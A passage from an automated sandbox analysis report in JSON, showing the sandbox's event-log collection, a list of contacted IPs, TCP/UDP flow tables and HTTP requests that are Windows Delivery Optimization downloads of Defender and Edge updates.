auxiliary module: Evtx\n2025-11-14 04:25:28,838 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Application.evtx to zip dump\n2025-11-14 04:25:28,853 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\HardwareEvents.evtx to zip dump\n2025-11-14 04:25:28,853 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Internet Explorer.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Key Management Service.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Security.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Setup.evtx to zip dump\n2025-11-14 04:25:28,884 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\System.evtx to zip dump\n2025-11-14 04:25:28,884 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Windows PowerShell.evtx to zip dump\n2025-11-14 04:25:28,916 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host\n2025-11-14 04:25:28,916 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 32064; Max size: 100000000\n2025-11-14 04:25:28,931 [root] INFO: Stopping auxiliary module: Procmon\n",
"errors": []
}
|
{
"pcap_sha256": "1bd62a01b1b7849f9436395a7f1791f13c4fa2168dea458c04d433ab10ea48ba",
"hosts": [
{
"ip": "52.109.44.110",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "72.153.5.129",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.218.90.51",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "72.153.5.137",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.62.41.126",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.209.193.217",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "135.232.92.34",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "150.171.28.12",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "184.24.98.54",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "199.232.210.172",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.58.95.152",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.58.95.138",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "13.107.246.48",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "20.190.146.38",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "104.91.59.106",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "104.91.59.130",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "14.102.231.204",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.38.50.202",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "52.123.129.14",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.212.254.112",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "104.46.162.226",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
}
],
"domains": [],
"tcp": [
{
"src": "192.168.122.71",
"sport": 49753,
"dst": "104.46.162.226",
"dport": 443,
"offset": 24,
"time": 0
},
{
"src": "192.168.122.71",
"sport": 49746,
"dst": "52.123.129.14",
"dport": 443,
"offset": 1132,
"time": 4.491070032119751
},
{
"src": "192.168.122.71",
"sport": 49683,
"dst": "23.38.50.202",
"dport": 80,
"offset": 1557,
"time": 4.52820897102356
},
{
"src": "192.168.122.71",
"sport": 49755,
"dst": "20.190.146.38",
"dport": 443,
"offset": 5367,
"time": 7.3674890995025635
},
{
"src": "192.168.122.71",
"sport": 49756,
"dst": "20.190.146.38",
"dport": 443,
"offset": 15921,
"time": 7.43644905090332
},
{
"src": "192.168.122.71",
"sport": 49757,
"dst": "14.102.231.204",
"dport": 80,
"offset": 26383,
"time": 7.494611978530884
},
{
"src": "192.168.122.71",
"sport": 49727,
"dst": "13.107.246.48",
"dport": 443,
"offset": 26987,
"time": 7.6508519649505615
},
{
"src": "192.168.122.71",
"sport": 49758,
"dst": "14.102.231.204",
"dport": 80,
"offset": 52358,
"time": 7.837268114089966
},
{
"src": "192.168.122.71",
"sport": 49760,
"dst": "14.102.231.204",
"dport": 80,
"offset": 53994,
"time": 8.243498086929321
},
{
"src": "192.168.122.71",
"sport": 49762,
"dst": "23.58.95.138",
"dport": 80,
"offset": 59188,
"time": 13.471807956695557
},
{
"src": "192.168.122.71",
"sport": 49763,
"dst": "23.58.95.152",
"dport": 80,
"offset": 59834,
"time": 13.473128080368042
},
{
"src": "192.168.122.71",
"sport": 49765,
"dst": "14.102.231.204",
"dport": 80,
"offset": 7588081,
"time": 17.795416116714478
},
{
"src": "192.168.122.71",
"sport": 49766,
"dst": "104.46.162.226",
"dport": 443,
"offset": 30616542,
"time": 30.347222089767456
},
{
"src": "192.168.122.71",
"sport": 49768,
"dst": "104.91.59.130",
"dport": 80,
"offset": 39051602,
"time": 37.27705407142639
},
{
"src": "192.168.122.71",
"sport": 49767,
"dst": "104.91.59.106",
"dport": 80,
"offset": 39052142,
"time": 37.27793502807617
},
{
"src": "192.168.122.71",
"sport": 49769,
"dst": "14.102.231.204",
"dport": 80,
"offset": 40721311,
"time": 37.434438943862915
},
{
"src": "192.168.122.71",
"sport": 49770,
"dst": "14.102.231.204",
"dport": 80,
"offset": 70800176,
"time": 48.20283389091492
},
{
"src": "192.168.122.71",
"sport": 49771,
"dst": "14.102.231.204",
"dport": 80,
"offset": 84535836,
"time": 53.44338893890381
},
{
"src": "192.168.122.71",
"sport": 49772,
"dst": "14.102.231.204",
"dport": 80,
"offset": 89112545,
"time": 55.12815308570862
},
{
"src": "192.168.122.71",
"sport": 49773,
"dst": "14.102.231.204",
"dport": 80,
"offset": 139707645,
"time": 72.32174491882324
},
{
"src": "192.168.122.71",
"sport": 49774,
"dst": "14.102.231.204",
"dport": 80,
"offset": 141093217,
"time": 81.70914793014526
},
{
"src": "192.168.122.71",
"sport": 49775,
"dst": "14.102.231.204",
"dport": 80,
"offset": 142181287,
"time": 91.00901198387146
},
{
"src": "192.168.122.71",
"sport": 49776,
"dst": "14.102.231.204",
"dport": 80,
"offset": 147197757,
"time": 110.9072151184082
},
{
"src": "192.168.122.71",
"sport": 49777,
"dst": "20.190.146.38",
"dport": 443,
"offset": 149613590,
"time": 123.63972806930542
},
{
"src": "192.168.122.71",
"sport": 49778,
"dst": "14.102.231.204",
"dport": 80,
"offset": 151148211,
"time": 130.69043588638306
},
{
"src": "192.168.122.71",
"sport": 49779,
"dst": "14.102.231.204",
"dport": 80,
"offset": 152174494,
"time": 136.72069311141968
},
{
"src": "192.168.122.71",
"sport": 49781,
"dst": "104.91.59.130",
"dport": 80,
"offset": 156003366,
"time": 152.73491406440735
},
{
"src": "192.168.122.71",
"sport": 49780,
"dst": "104.91.59.106",
"dport": 80,
"offset": 156003905,
"time": 152.73606395721436
},
{
"src": "192.168.122.71",
"sport": 49782,
"dst": "20.190.146.38",
"dport": 443,
"offset": 349813338,
"time": 218.62622690200806
},
{
"src": "192.168.122.71",
"sport": 49785,
"dst": "23.212.254.112",
"dport": 443,
"offset": 349850713,
"time": 264.64726090431213
}
],
"udp": [
{
"src": "192.168.122.71",
"sport": 56867,
"dst": "192.168.122.1",
"dport": 53,
"offset": 662,
"time": 3.0554490089416504
},
{
"src": "192.168.122.71",
"sport": 65387,
"dst": "192.168.122.1",
"dport": 53,
"offset": 3983,
"time": 6.602866888046265
},
{
"src": "192.168.122.71",
"sport": 49797,
"dst": "192.168.122.1",
"dport": 53,
"offset": 5026,
"time": 7.157042026519775
},
{
"src": "192.168.122.71",
"sport": 54090,
"dst": "192.168.122.1",
"dport": 53,
"offset": 39691,
"time": 7.692573070526123
},
{
"src": "192.168.122.71",
"sport": 64947,
"dst": "192.168.122.1",
"dport": 53,
"offset": 56193,
"time": 10.951642990112305
},
{
"src": "192.168.122.71",
"sport": 61510,
"dst": "192.168.122.1",
"dport": 53,
"offset": 56598,
"time": 11.110265970230103
},
{
"src": "192.168.122.71",
"sport": 55952,
"dst": "192.168.122.1",
"dport": 53,
"offset": 56923,
"time": 11.498348951339722
},
{
"src": "192.168.122.71",
"sport": 63662,
"dst": "192.168.122.1",
"dport": 53,
"offset": 58139,
"time": 12.508946895599365
},
{
"src": "192.168.122.71",
"sport": 64473,
"dst": "192.168.122.1",
"dport": 53,
"offset": 58241,
"time": 12.51788592338562
},
{
"src": "192.168.122.71",
"sport": 63473,
"dst": "192.168.122.1",
"dport": 53,
"offset": 62344,
"time": 13.548141956329346
},
{
"src": "192.168.122.71",
"sport": 56746,
"dst": "192.168.122.1",
"dport": 53,
"offset": 765416,
"time": 13.637569904327393
},
{
"src": "192.168.122.71",
"sport": 50947,
"dst": "192.168.122.1",
"dport": 53,
"offset": 765517,
"time": 13.659717082977295
},
{
"src": "192.168.122.71",
"sport": 58822,
"dst": "192.168.122.1",
"dport": 53,
"offset": 2845857,
"time": 14.524619102478027
},
{
"src": "192.168.122.71",
"sport": 52657,
"dst": "192.168.122.1",
"dport": 53,
"offset": 3401478,
"time": 15.093657970428467
},
{
"src": "192.168.122.71",
"sport": 54617,
"dst": "192.168.122.1",
"dport": 53,
"offset": 8949939,
"time": 18.6390221118927
},
{
"src": "192.168.122.71",
"sport": 56244,
"dst": "192.168.122.1",
"dport": 53,
"offset": 10064582,
"time": 19.267611980438232
},
{
"src": "192.168.122.71",
"sport": 54876,
"dst": "192.168.122.1",
"dport": 53,
"offset": 10620162,
"time": 19.74019193649292
},
{
"src": "192.168.122.71",
"sport": 51333,
"dst": "192.168.122.1",
"dport": 53,
"offset": 14520556,
"time": 22.265891075134277
},
{
"src": "192.168.122.71",
"sport": 137,
"dst": "192.168.122.1",
"dport": 137,
"offset": 16056492,
"time": 23.001708984375
},
{
"src": "192.168.122.71",
"sport": 56189,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16064164,
"time": 23.002031087875366
},
{
"src": "192.168.122.71",
"sport": 54433,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 16069048,
"time": 23.00248408317566
},
{
"src": "192.168.122.71",
"sport": 56192,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16361069,
"time": 23.032903909683228
},
{
"src": "192.168.122.71",
"sport": 56114,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16373737,
"time": 23.049041032791138
},
{
"src": "192.168.122.71",
"sport": 52775,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16394182,
"time": 23.134582996368408
},
{
"src": "192.168.122.71",
"sport": 53194,
"dst": "192.168.122.1",
"dport": 53,
"offset": 21178748,
"time": 25.5954909324646
},
{
"src": "192.168.122.71",
"sport": 57772,
"dst": "192.168.122.1",
"dport": 53,
"offset": 21178850,
"time": 25.596734046936035
},
{
"src": "192.168.122.71",
"sport": 51419,
"dst": "192.168.122.1",
"dport": 53,
"offset": 24183247,
"time": 27.12466597557068
},
{
"src": "192.168.122.71",
"sport": 62442,
"dst": "192.168.122.1",
"dport": 53,
"offset": 31209879,
"time": 30.688009023666382
},
{
"src": "192.168.122.71",
"sport": 50858,
"dst": "192.168.122.1",
"dport": 53,
"offset": 35515959,
"time": 35.05170011520386
},
{
"src": "192.168.122.71",
"sport": 55639,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 35520860,
"time": 35.127301931381226
},
{
"src": "192.168.122.71",
"sport": 58460,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 35527128,
"time": 35.129010915756226
},
{
"src": "192.168.122.71",
"sport": 138,
"dst": "192.168.122.255",
"dport": 138,
"offset": 47584069,
"time": 39.81338810920715
},
{
"src": "192.168.122.71",
"sport": 49496,
"dst": "192.168.122.1",
"dport": 53,
"offset": 47931370,
"time": 40.124013900756836
},
{
"src": "192.168.122.71",
"sport": 56501,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 47951604,
"time": 40.12581396102905
},
{
"src": "192.168.122.71",
"sport": 61551,
"dst": "192.168.122.1",
"dport": 53,
"offset": 62642136,
"time": 45.24574303627014
},
{
"src": "192.168.122.71",
"sport": 54301,
"dst": "192.168.122.1",
"dport": 53,
"offset": 74291363,
"time": 49.581263065338135
},
{
"src": "192.168.122.71",
"sport": 57288,
"dst": "192.168.122.1",
"dport": 53,
"offset": 74293061,
"time": 49.62503790855408
},
{
"src": "192.168.122.71",
"sport": 54682,
"dst": "192.168.122.1",
"dport": 53,
"offset": 92413270,
"time": 56.26534700393677
},
{
"src": "192.168.122.71",
"sport": 52641,
"dst": "192.168.122.1",
"dport": 53,
"offset": 115778732,
"time": 64.31397795677185
},
{
"src": "192.168.122.71",
"sport": 58786,
"dst": "192.168.122.1",
"dport": 53,
"offset": 128143432,
"time": 68.29185390472412
},
{
"src": "192.168.122.71",
"sport": 53220,
"dst": "192.168.122.1",
"dport": 53,
"offset": 140128745,
"time": 74.57409310340881
},
{
"src": "192.168.122.71",
"sport": 62994,
"dst": "192.168.122.1",
"dport": 53,
"offset": 140590843,
"time": 77.98991203308105
},
{
"src": "192.168.122.71",
"sport": 60100,
"dst": "192.168.122.1",
"dport": 53,
"offset": 140917115,
"time": 80.43291997909546
},
{
"src": "192.168.122.71",
"sport": 52949,
"dst": "192.168.122.1",
"dport": 53,
"offset": 141114134,
"time": 82.03927707672119
},
{
"src": "192.168.122.71",
"sport": 137,
"dst": "192.168.122.255",
"dport": 137,
"offset": 141144319,
"time": 82.47173690795898
},
{
"src": "192.168.122.71",
"sport": 59690,
"dst": "192.168.122.1",
"dport": 53,
"offset": 141319997,
"time": 84.04982709884644
},
{
"src": "192.168.122.71",
"sport": 63872,
"dst": "192.168.122.1",
"dport": 53,
"offset": 141465391,
"time": 85.05850601196289
},
{
"src": "192.168.122.71",
"sport": 49770,
"dst": "192.168.122.1",
"dport": 53,
"offset": 142197292,
"time": 91.09865498542786
},
{
"src": "192.168.122.71",
"sport": 61512,
"dst": "192.168.122.1",
"dport": 53,
"offset": 142422605,
"time": 92.49086308479309
},
{
"src": "192.168.122.71",
"sport": 62896,
"dst": "192.168.122.1",
"dport": 53,
"offset": 144837706,
"time": 101.3786849975586
},
{
"src": "192.168.122.71",
"sport": 53591,
"dst": "192.168.122.1",
"dport": 53,
"offset": 145799130,
"time": 104.537113904953
},
{
"src": "192.168.122.71",
"sport": 61434,
"dst": "192.168.122.1",
"dport": 53,
"offset": 147248496,
"time": 111.3104190826416
},
{
"src": "192.168.122.71",
"sport": 50339,
"dst": "192.168.122.1",
"dport": 53,
"offset": 148230284,
"time": 116.56716299057007
},
{
"src": "192.168.122.71",
"sport": 62573,
"dst": "192.168.122.1",
"dport": 53,
"offset": 151060723,
"time": 130.1927900314331
},
{
"src": "192.168.122.71",
"sport": 64370,
"dst": "192.168.122.1",
"dport": 53,
"offset": 152143138,
"time": 136.22589302062988
},
{
"src": "192.168.122.71",
"sport": 63935,
"dst": "192.168.122.1",
"dport": 53,
"offset": 153067356,
"time": 141.64666199684143
},
{
"src": "192.168.122.71",
"sport": 60214,
"dst": "192.168.122.1",
"dport": 53,
"offset": 154028944,
"time": 144.8700408935547
},
{
"src": "192.168.122.71",
"sport": 58470,
"dst": "192.168.122.1",
"dport": 53,
"offset": 184893358,
"time": 157.7529399394989
},
{
"src": "192.168.122.71",
"sport": 51632,
"dst": "192.168.122.1",
"dport": 53,
"offset": 218950619,
"time": 163.70560789108276
},
{
"src": "192.168.122.71",
"sport": 57049,
"dst": "192.168.122.1",
"dport": 53,
"offset": 255303637,
"time": 169.9826900959015
},
{
"src": "192.168.122.71",
"sport": 56331,
"dst": "192.168.122.1",
"dport": 53,
"offset": 294021176,
"time": 176.679682970047
},
{
"src": "192.168.122.71",
"sport": 52462,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 323613240,
"time": 182.01897406578064
},
{
"src": "192.168.122.71",
"sport": 65416,
"dst": "192.168.122.1",
"dport": 53,
"offset": 334516749,
"time": 183.9507908821106
},
{
"src": "192.168.122.71",
"sport": 55524,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349811084,
"time": 187.79713010787964
},
{
"src": "192.168.122.71",
"sport": 50513,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349811790,
"time": 195.9781939983368
},
{
"src": "192.168.122.71",
"sport": 53348,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349812280,
"time": 209.6638150215149
},
{
"src": "192.168.122.71",
"sport": 52623,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349812624,
"time": 217.55621099472046
},
{
"src": "192.168.122.71",
"sport": 54435,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349817807,
"time": 218.9519259929657
},
{
"src": "192.168.122.71",
"sport": 53028,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349818578,
"time": 229.76046991348267
},
{
"src": "192.168.122.71",
"sport": 60891,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349849635,
"time": 242.131000995636
},
{
"src": "192.168.122.71",
"sport": 59960,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349850065,
"time": 257.5831050872803
}
],
"icmp": [],
"http": [
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=32505856-33554431\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.5\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196465.981339
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=103809024-104333311\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: kjofpJMLf0OQ34afHprSCA.0.2.13.1.1.10\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"body": "",
"path": "/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196466.323995
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=104333312-104857599\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: kjofpJMLf0OQ34afHprSCA.0.2.13.1.1.11\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"body": "",
"path": "/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196466.730225
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=192937984-193986559\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.6\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196476.282143
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=159383552-159907839\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.7\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196484.106943
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=159907840-160432127\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.8\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196489.030389
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=183500800-184025087\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.9\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196495.528199
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.10\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196495.921166
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=191889408-192937983\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.11\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196501.19123
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
